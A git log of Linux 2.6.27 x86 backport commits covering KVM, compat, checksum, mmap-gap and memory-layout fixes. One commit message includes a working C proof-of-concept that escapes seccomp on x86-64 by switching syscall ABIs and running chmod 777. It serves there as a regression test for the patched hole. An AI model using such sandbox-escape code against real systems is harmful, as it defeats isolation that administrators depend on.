linux-toradex.git/include/asm-x86, branch v2.6.27.54

compat: Make compat_alloc_user_space() incorporate the access_ok()

2010-09-20T20:03:21+00:00

commit c41d68a513c71e35a14f66d71782d27a79a81ea6 upstream.

compat_alloc_user_space() expects the caller to independently call
access_ok() to verify the returned area.  A missing call could
introduce problems on some architectures.

This patch incorporates the access_ok() check into
compat_alloc_user_space() and also adds a sanity check on the length.
The existing compat_alloc_user_space() implementations are renamed
arch_compat_alloc_user_space() and are used as part of the
implementation of the new global function.

This patch assumes NULL will cause __get_user()/__put_user() to either
fail or access userspace on all architectures.  This should be
followed by checking the return value of compat_access_user_space()
for NULL in the callers, at which time the access_ok() in the callers
can also be removed.

Reported-by: Ben Hawkes 
Signed-off-by: H. Peter Anvin 
Acked-by: Benjamin Herrenschmidt 
Acked-by: Chris Metcalf 
Acked-by: David S. Miller 
Acked-by: Ingo Molnar 
Acked-by: Thomas Gleixner 
Acked-by: Tony Luck 
Cc: Andrew Morton 
Cc: Arnd Bergmann 
Cc: Fenghua Yu 
Cc: H. Peter Anvin 
Cc: Heiko Carstens 
Cc: Helge Deller 
Cc: James Bottomley 
Cc: Kyle McMartin 
Cc: Martin Schwidefsky 
Cc: Paul Mackerras 
Cc: Ralf Baechle 
Signed-off-by: Greg Kroah-Hartman

KVM: VMX: Check cpl before emulating debug register access

2010-04-01T22:52:24+00:00

commit 0a79b009525b160081d75cef5dbf45817956acf2 upstream.

Debug registers may only be accessed from cpl 0.  Unfortunately, vmx will
code to emulate the instruction even though it was issued from guest
userspace, possibly leading to an unexpected trap later.

Signed-off-by: Avi Kivity 
Signed-off-by: Marcelo Tosatti 
Signed-off-by: Greg Kroah-Hartman

KVM: x86 emulator: limit instructions to 15 bytes

2010-04-01T22:52:23+00:00

commit eb3c79e64a70fb8f7473e30fa07e89c1ecc2c9bb upstream

[ : backport to 2.6.27 ]

While we are never normally passed an instruction that exceeds 15 bytes,
smp games can cause us to attempt to interpret one, which will cause
large latencies in non-preempt hosts.

Signed-off-by: Avi Kivity 
Signed-off-by: Greg Kroah-Hartman

x86: fix csum_ipv6_magic asm memory clobber

2010-04-01T22:52:19+00:00

commit 392d814daf460a9564d29b2cebc51e1ea34e0504 upstream.

Just like ip_fast_csum, the assembly snippet in csum_ipv6_magic needs a
memory clobber, as it is only passed the address of the buffer, not a
memory reference to the buffer itself.

This caused failures in Hurd's pfinetv4 when we tried to compile it with
gcc-4.3 (bogus checksums).

Signed-off-by: Samuel Thibault 
Cc: Ingo Molnar 
Cc: Thomas Gleixner 
Cc: "H. Peter Anvin" 
Acked-by: "David S. Miller" 
Cc: Andi Kleen 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Greg Kroah-Hartman

x86: Increase MIN_GAP to include randomized stack

2009-10-12T18:33:15+00:00

[ trivial backport to 2.6.27: Chuck Ebbert  ]

commit 80938332d8cf652f6b16e0788cf0ca136befe0b5 upstream.

Currently we are not including randomized stack size when calculating
mmap_base address in arch_pick_mmap_layout for topdown case. This might
cause that mmap_base starts in the stack reserved area because stack is
randomized by 1GB for 64b (8MB for 32b) and the minimum gap is 128MB.

If the stack really grows down to mmap_base then we can get silent mmap
region overwrite by the stack values.

Let's include maximum stack randomization size into MIN_GAP which is
used as the low bound for the gap in mmap.

Signed-off-by: Michal Hocko 
LKML-Reference: <1252400515-6866-1-git-send-email-mhocko@suse.cz>
Acked-by: Jiri Kosina 
Signed-off-by: H. Peter Anvin 
Cc: Chuck Ebbert 
Signed-off-by: Greg Kroah-Hartman

KVM: Reduce stack usage in kvm_pv_mmu_op()

2009-09-09T03:17:12+00:00

(cherry picked from commit 6ad18fba05228fb1d47cdbc0339fe8b3fca1ca26)

We're in a hot path.  We can't use kmalloc() because
it might impact performance.  So, we just stick the buffer that
we need into the kvm_vcpu_arch structure.  This is used very
often, so it is not really a waste.

We also have to move the buffer structure's definition to the
arch-specific x86 kvm header.

Signed-off-by: Dave Hansen 
Signed-off-by: Avi Kivity 
Signed-off-by: Greg Kroah-Hartman

x86: fix assembly constraints in native_save_fl()

2009-08-16T21:26:52+00:00

commit f1f029c7bfbf4ee1918b90a431ab823bed812504 upstream.

From Gabe Black in bugzilla 13888:

native_save_fl is implemented as follows:

  11static inline unsigned long native_save_fl(void)
  12{
  13        unsigned long flags;
  14
  15        asm volatile("# __raw_save_flags\n\t"
  16                     "pushf ; pop %0"
  17                     : "=g" (flags)
  18                     : /* no input */
  19                     : "memory");
  20
  21        return flags;
  22}

If gcc chooses to put flags on the stack, for instance because this is
inlined into a larger function with more register pressure, the offset
of the flags variable from the stack pointer will change when the
pushf is performed. gcc doesn't attempt to understand that fact, and
address used for pop will still be the same. It will write to
somewhere near flags on the stack but not actually into it and
overwrite some other value.

I saw this happen in the ide_device_add_all function when running in a
simulator I work on. I'm assuming that some quirk of how the simulated
hardware is set up caused the code path this is on to be executed when
it normally wouldn't.

A simple fix might be to change "=g" to "=r".

Reported-by: Gabe Black 
Signed-off-by: H. Peter Anvin 
Signed-off-by: Greg Kroah-Hartman

Fix misreporting of #cores as #hyperthreads for Q9550

2009-03-23T22:00:04+00:00

Fix misreporting of #cores for the Intel Quad Core Q9550.

For the Q9550, in x86_64 mode, /proc/cpuinfo mistakenly
reports the #cores present as the #hyperthreads present.
i386 mode was not examined but is assumed to have the
same problem.

A backport of the following three 2.6.29-rc1 patches
fixes the problem:
  066941bd4eeb159307a5d7d795100d0887c00442:
    [PATCH] x86: unmask CPUID levels on Intel CPUs
  99fb4d349db7e7dacb2099c5cc320a9e2d31c1ef:
    [PATCH] x86: unmask CPUID levels on Intel CPUs, fix
  bdf21a49bab28f0d9613e8d8724ef9c9168b61b9:
    [PATCH] x86: add MSR_IA32_MISC_ENABLE bits to 

From the first patch: "If the CPUID limit bit in
MSR_IA32_MISC_ENABLE is set, clear it to make all CPUID
information available.  This is required for some features
to work, in particular XSAVE."

Originally-Developed-by: H. Peter Anvin 
Backported-by: Joe Korty 
Cc: Ingo Molnar 
Signed-off-by: Joe Korty 
Signed-off-by: Greg Kroah-Hartman

x86-64: seccomp: fix 32/64 syscall hole

2009-03-17T00:52:59+00:00

commit 5b1017404aea6d2e552e991b3fd814d839e9cd67 upstream.

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include 
	#include 
	#include 
	#include 
	#include 
	#include 
	#include 

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath 
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds 
Signed-off-by: Greg Kroah-Hartman

mm: clean up for early_pfn_to_nid()

2009-03-17T00:52:45+00:00

commit f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 upstream.

What's happening is that the assertion in mm/page_alloc.c:move_freepages()
is triggering:

	BUG_ON(page_zone(start_page) != page_zone(end_page));

Once I knew this is what was happening, I added some annotations:

	if (unlikely(page_zone(start_page) != page_zone(end_page))) {
		printk(KERN_ERR "move_freepages: Bogus zones: "
		       "start_page[%p] end_page[%p] zone[%p]\n",
		       start_page, end_page, zone);
		printk(KERN_ERR "move_freepages: "
		       "start_zone[%p] end_zone[%p]\n",
		       page_zone(start_page), page_zone(end_page));
		printk(KERN_ERR "move_freepages: "
		       "start_pfn[0x%lx] end_pfn[0x%lx]\n",
		       page_to_pfn(start_page), page_to_pfn(end_page));
		printk(KERN_ERR "move_freepages: "
		       "start_nid[%d] end_nid[%d]\n",
		       page_to_nid(start_page), page_to_nid(end_page));
 ...

And here's what I got:

	move_freepages: Bogus zones: start_page[2207d0000] end_page[2207dffc0] zone[fffff8103effcb00]
	move_freepages: start_zone[fffff8103effcb00] end_zone[fffff8003fffeb00]
	move_freepages: start_pfn[0x81f600] end_pfn[0x81f7ff]
	move_freepages: start_nid[1] end_nid[0]

My memory layout on this box is:

[    0.000000] Zone PFN ranges:
[    0.000000]   Normal   0x00000000 -> 0x0081ff5d
[    0.000000] Movable zone start PFN for each node
[    0.000000] early_node_map[8] active PFN ranges
[    0.000000]     0: 0x00000000 -> 0x00020000
[    0.000000]     1: 0x00800000 -> 0x0081f7ff
[    0.000000]     1: 0x0081f800 -> 0x0081fe50
[    0.000000]     1: 0x0081fed1 -> 0x0081fed8
[    0.000000]     1: 0x0081feda -> 0x0081fedb
[    0.000000]     1: 0x0081fedd -> 0x0081fee5
[    0.000000]     1: 0x0081fee7 -> 0x0081ff51
[    0.000000]     1: 0x0081ff59 -> 0x0081ff5d

So it's a block move in that 0x81f600-->0x81f7ff region which triggers
the problem.

This patch:

Declaration of early_pfn_to_nid() is scattered over per-arch include
files, and it seems it's complicated to know when the declaration is used.
 I think it makes fix-for-memmap-init not easy.

This patch moves all declaration to include/linux/mm.h

After this,
  if !CONFIG_NODES_POPULATES_NODE_MAP && !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
     -> Use static definition in include/linux/mm.h
  else if !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
     -> Use generic definition in mm/page_alloc.c
  else
     -> per-arch back end function will be called.

Signed-off-by: KAMEZAWA Hiroyuki 
Tested-by: KOSAKI Motohiro 
Reported-by: David Miller 
Cc: Mel Gorman 
Cc: Heiko Carstens 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Greg Kroah-Hartman